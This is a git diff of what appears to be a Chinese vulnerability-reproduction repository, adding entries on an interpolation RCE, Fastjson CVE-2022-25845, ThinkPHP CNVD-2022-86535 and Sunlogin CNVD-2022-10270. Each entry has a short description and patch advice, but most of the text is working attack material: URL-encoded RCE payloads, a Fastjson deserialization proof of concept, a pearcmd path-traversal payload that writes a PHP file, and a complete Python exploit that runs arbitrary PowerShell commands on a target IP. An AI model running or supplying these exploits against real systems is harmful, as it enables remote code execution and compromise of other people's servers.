search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D
可以尝试
search=${url:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}
search=${dns:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}
```
## 修复建议
官方已发布漏洞补丁及修复版本,请评估业务是否受影响后,酌情升级至安全版本。

57
开发框架漏洞/Fastjson 远程代码执行漏洞 CVE-2022-25845.md Normal file
View File

@ -0,0 +1,57 @@
# Fastjson 远程代码执行漏洞 CVE-2022-25845
## 漏洞描述
Fastjson 是阿里巴巴的开源 JSON 解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列 化到 JavaBean。在 Fastjson 1.2.80 及以下版本中存在反序列化漏洞,攻击者可 以在特定依赖下利用此漏洞绕过默认 autoType 关闭限制,从而反序列化有安全风险的类。
## 漏洞影响
```
Fastjson ≤ 1.2.80
```
## 漏洞复现
利用 idea 创建 maven 项目 搭建漏洞环境,在 pom 文件中添加
```
<dependency>
<groupId>com.alibaba</groupId>
<artifactId>fastjson</artifactId>
<version>1.2.82</version>
</dependency>
```
创建文件夹 com.example.fastjson在下面添加两个 java 文件
```
package com.example.fastjson;
import java.io.IOException;
public class Poc extends Exception {
public void setName(String str) {
try {
Runtime.getRuntime().exec(str);
} catch (IOException e) {
e.printStackTrace();
}
}
}
package com.example.fastjson;
import com.alibaba.fastjson.JSON;
public class PocDemo {
public static void main(String[] args) {
String json = "{\"@type\":\"java.lang.Exception\",\"@type\":\"com.example.fastjson.Poc\",\"name\":\"calc\"}";
JSON.parse(json);
}
}
```
运行 PocDemo
## 漏洞修复
1. 升级至版本 FastJson 1.2.83https://github.com/alibaba/fastjson/releases/tag/1.2.83
2. 升级到 FastJosn v2https://github.com/alibaba/fastjson2/releases

29
开发框架漏洞/ThinkPHP 命令执行漏洞 CNVD-2022-86535.md Normal file
View File

@ -0,0 +1,29 @@
# ThinkPHP 命令执行漏洞 CNVD-2022-86535
## 漏洞描述
该漏洞是由于 Thinkphp 开启了多语言功能,并且对参数 lang 传参过滤不严谨,导致攻击者可利用该漏洞执行命令。
## 漏洞影响
```
ThinkPHP >=V6.0.1<=V6.0.13
ThinkPHP >=V5.0.X<=V5.1.X
```
## 漏洞复现
payload
```
/index?lang=…/…/…/…/…/…/…/…/usr/local/lib/php/pearcmd&+config-create+/&/+/var/www/html/test.php
```
## 漏洞修复
官方已发布漏洞补丁及修复版本,可以评估业务是否受影响后,酌情升级至安全版本。
如不需要多语言功能,请及时关闭此功能,可参考官方文档:
- https://www.kancloud.cn/manual/thinkphp6_0/1037637
- https://static.kancloud.cn/manual/thinkphp5/118132

47
服务器应用漏洞/向日葵 check 远程命令执行漏洞 CNVD-2022-10270.md
View File

@ -36,4 +36,49 @@ body="Verification failure"
/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+ipconfig
```
![](./images/202205241354108.png)
![](./images/202205241354108.png)
## 漏洞修复
1. 输入检查:应用程序必须实现输入检查机制,将所有从外部接收的数据都进行严格的检查和过滤,防止恶意代码被注入。
2. 参数化查询:采用参数化查询可以防止攻击者通过利用应用程序的注入漏洞来修改查询语句,实现任意代码执行的攻击。
3. 输出编码:在输出时对敏感字符进行编码保护,比如 HTML 编码,防止恶意代码直接输出执行。
4. 使用最新的安全防护措施:保证服务器系统和应用程序的所有组件、库和插件都是最 新的,确保已知的漏洞都得到修复。
5. 强制访问控制:应该设置访问控制机制,确保恶意用户无法访问敏感数据和代码。
## 漏洞POC
exp
```
import requests,sys
ip = sys.argv[1]
command = sys.argv[2]
payload1 = "/cgi-bin/rpc?action=verify-haras"
payload2 = "/check?cmd=ping../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/powershell.exe+"
headers = {
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0'
}
if "http://" not in ip:
host = "http://" + ip
else:
host = ip
try:
s = requests.Session()
res = s.get(url=host + payload1,headers=headers)
if res.status_code == 200:
res = res.json()
Cid = res['verify_string']
headers.update({'Cookie':"CID=" + Cid})
res1 = s.get(url=host + payload2 + command,headers=headers)
res1.encoding = "GBK"
print(res1.text)
else:
pass
except Exception as e:
print(e)
```